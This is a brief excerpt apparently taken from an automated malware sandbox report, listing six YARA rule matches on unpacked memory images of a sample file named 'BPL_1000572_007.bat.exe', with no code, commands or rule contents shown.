Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE